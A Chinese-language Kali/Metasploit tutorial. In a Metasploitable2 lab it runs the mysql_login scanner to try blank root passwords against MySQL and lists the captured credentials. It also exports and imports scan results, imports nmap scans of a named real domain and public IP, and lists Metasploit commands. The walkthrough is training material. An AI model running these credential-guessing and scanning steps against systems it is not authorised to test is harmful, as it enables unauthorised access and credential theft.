天天看點

網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

實戰-使用msf掃描靶機上mysql服務的空密碼

我們啟動一台Metasploitable2-Linux靶機網絡模式為橋接IP:192.168.1.180

網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

登入Metasploitable2-Linux系統使用者名root,密碼:123456 輸入ip a 檢視ip位址

網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

登入Kali開始搜尋子產品

msf6> search mysql_login           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

加載子產品

msf6 > use auxiliary/scanner/mysql/mysql_login           

檢視子產品配置項

msf6 auxiliary(scanner/mysql/mysql_login) > show options           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

我們配置要爆破的使用者

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root           

參數:BLANK_PASSWORDS 含意:Try blank passwords for all users #為所有使用者嘗試空密碼 。 blank [blæŋk] 空白的

開啟為所有使用者嘗試空密碼

msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true           

設定目标主機

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

配置完成以後我們執行run 或者exploit

msf6 auxiliary(scanner/mysql/mysql_login) > exploit           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

執行成功

使用後端憑證指令creds , 列出資料庫中的所有憑據

Credentials   [krəˈdenʃlz]  憑證;證書;
msf6 auxiliary(scanner/mysql/mysql_login) > creds           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

以下有視訊版還有文字版

不知道怎麼操作的請看文字版的,裡面詳細的步驟。

關注公衆号俠盜男爵回複【kali系統】

将掃描的結果導出Metasploit與導入另一台機器的Metasploit中

資料庫後端指令:

db_connect   連接配接到現有的資料庫
db_disconnect   斷開與目前資料庫執行個體的連接配接
db_export   導出包含資料庫内容的檔案
db_import   導入掃描結果檔案(檔案類型将被自動檢測)           

例1:将前面掃描mysql資料庫空密碼資訊導出

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml           

注:導出隻支援兩種格式:xml和pwdump

常用的導出格式為 xml

網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

導出以後退出程式

msf6 auxiliary(scanner/mysql/mysql_login) > exit           

例2:将掃描的結果導入另一台機器的Metasploit中 我們就不再開一台新Kali,直接重置資料庫,當成新的來用

┌──(rootxuegod53)-[~]
└─# msfdb reinit                 

連接配接Metasploit

└─# msfconsole
msf6 > hosts           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

資料庫中主機資訊是空的,我們導入資料

msf6 > db_import /root/bak.xml           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務
msf6 > hosts           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

hosts指令有多個選項,通過 hosts -h 可以檢視

msf6 > hosts -h           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

在這裡,最重要的是選項 -c,此選項使我們能夠選擇要用hosts指令顯示的資料的列或字段(類似于SQL中的select指令)。在上圖中可以看到顯示的可用列。 例:顯示指定列的主機資訊

msf6 > hosts -c address,name,os_name           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

删除指定主機

msf6 > hosts -d 192.168.1.180           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

除此之外我們還可以直接将NMAP的掃描結果導入到Metasploit資料庫中我們新開一個終端視窗來進行掃描。

└─# nmap -A xuegod.cn -oX xuegod.xml 
-oX  将掃描資訊導出到XML檔案中           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

我們回到Metasploit導入掃描結果

msf6 > db_import /root/xuegod.xml           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務
msf5 > hosts           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

檢視我們資料庫中的主機都開放了哪些服務

msf5 > services           
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

顯示指定主機的服務資訊

msf5 > services  -R 101.200.128.35            
網絡安全kali滲透學習 web滲透入門 使用msf掃描靶機上mysql服務

擴充: 在msf指令提示符下輸入help後,顯示的指令清單和作用描述。 msf6 > help

核心指令

?   幫助菜單
banner   顯示一個metasploit橫幅
cd   更改目前的工作目錄
color   切換顔色
connect   連接配接與主機通信
exit   退出控制台
get   擷取特定于上下文的變量的值
getg   擷取全局變量的值
grep grep另一個指令的輸出  如: grep creds help
help   幫助菜單
history   顯示指令曆史
irb   進入irb腳本模式
load   加載一個架構插件
quit   退出控制台
route   通過會話路由流量
save   儲存活動的資料存儲
sessions    轉儲會話清單并顯示有關會話的資訊
set   将特定于上下文的變量設定為一個值
setg   将全局變量設定為一個值
sleep   在指定的秒數内不做任何事情
spool   将控制台輸出寫入檔案以及螢幕
threads   線程檢視和操作背景線程
unload   解除安裝架構插件
unset   取消設定一個或多個特定于上下文的變量
unsetg   取消設定一個或多個全局變量
version   顯示架構和控制台庫版本号
           

子產品指令

advanced   顯示一個或多個子產品的進階選項
back   從目前上下文傳回
edit   使用首選編輯器編輯目前子產品
info   顯示有關一個或多個子產品的資訊
loadpath   路徑從路徑搜尋并加載子產品
options   顯示全局選項或一個或多個子產品
popm   将最新的子產品從堆棧中彈出并使其處于活動狀态
previous   将之前加載的子產品設定為目前子產品
pushm   将活動或子產品清單推入子產品堆棧
reload_all   從所有定義的子產品路徑重新加載所有子產品
search   搜尋子產品名稱和描述
show   顯示給定類型的子產品或所有子產品
use   按名稱選擇子產品
           

工作指令

handler   作為作業啟動負載處理程式
jobs   顯示和管理作業
kill   殺死一個工作
rename_job   重命名作業
           

資源腳本指令

makerc   儲存從開始到檔案輸入的指令
resource   運作存儲在檔案中的指令
           

資料庫後端指令

db_connect   連接配接到現有的資料庫
db_disconnect   斷開與目前資料庫執行個體的連接配接
db_export   導出包含資料庫内容的檔案
db_import   導入掃描結果檔案(檔案類型将被自動檢測)
db_nmap   執行nmap并自動記錄輸出
db_rebuild_cache   重建資料庫存儲的子產品高速緩存
db_status   顯示目前的資料庫狀态
hosts   列出資料庫中的所有主機
loot   列出資料庫中的所有戰利品
notes   列出資料庫中的所有筆記
services   列出資料庫中的所有服務
vulns   列出資料庫中的所有漏洞
workspace   在資料庫工作區之間切換
creds   列出資料庫中的所有憑據